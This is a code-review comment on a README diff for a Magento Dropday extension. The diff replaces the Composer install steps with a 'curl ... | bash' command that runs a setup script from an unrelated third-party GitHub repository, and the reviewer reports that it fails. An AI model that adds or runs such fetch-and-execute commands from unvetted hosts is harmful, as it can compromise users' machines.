README.md

```diff
@@ -1,32 +1,34 @@
 Magento Extension for Dropday
-===============
+This is a Magento extension that enables Dropday functionality for your Magento store.
 
-Dropday.io is a service to automate your webshop orders. With Dropday.io you can forward orders automatically to your suppliers via different methods, for example by placing a XML file on FTP, sending an email or letting a Dropday employee place a manual order on another webshop. This solution is ideal for dropshipping, fulfillment or other types or supplier automation.
+Installation
+Create a directory named sites on your system:
 
-This extension will connect to the API and forward your orders to Dropday.io. To connect to the API make an account at [Dropday.io](https://dropday.io/register).
+sudo mkdir sites
 
-## How to install the extension?
+Navigate to the sites directory:
 
-### 1. Installion via Composer
+cd sites
 
-```
-composer require dropday-io/module-orderautomation
-```
+Run the following command to execute the installation scripts and set up Docker:
 
-### 2. Enable
+curl -s https://raw.githubusercontent.com/devopsoptimbytes/docker-magento/master/lib/onelinesetup | bash -s -- magento.test 2.4.6-p2 community
 
-```
-php bin/magento module:enable Dropday_OrderAutomation
-php bin/magento setup:upgrade
-php bin/magento cache:clean
-```
+During the process, you will be prompted for credentials for repo.magento.com:
```

Comment:
Not working, see response:

```
sites $ curl -s https://raw.githubusercontent.com/devopsoptimbytes/docker-magento/master/lib/onelinesetup | bash -s -- magento.test 2.4.6-p2 community
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint: 
hint: 	git config --global init.defaultBranch <name>
hint: 
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint: 
hint: 	git branch -m <name>
Initialized empty Git repository in ***/Magento/sites/.git/
There must be at least 6GB of RAM allocated to Docker to continue.
service "phpfpm" is not running container #1
service "phpfpm" is not running container #1
Composer auth has been set up.
Fixing filesystem ownerships...
service "phpfpm" is not running container #1
Filesystem ownerships fixed.
service "phpfpm" is not running container #1
service "phpfpm" is not running container #1
```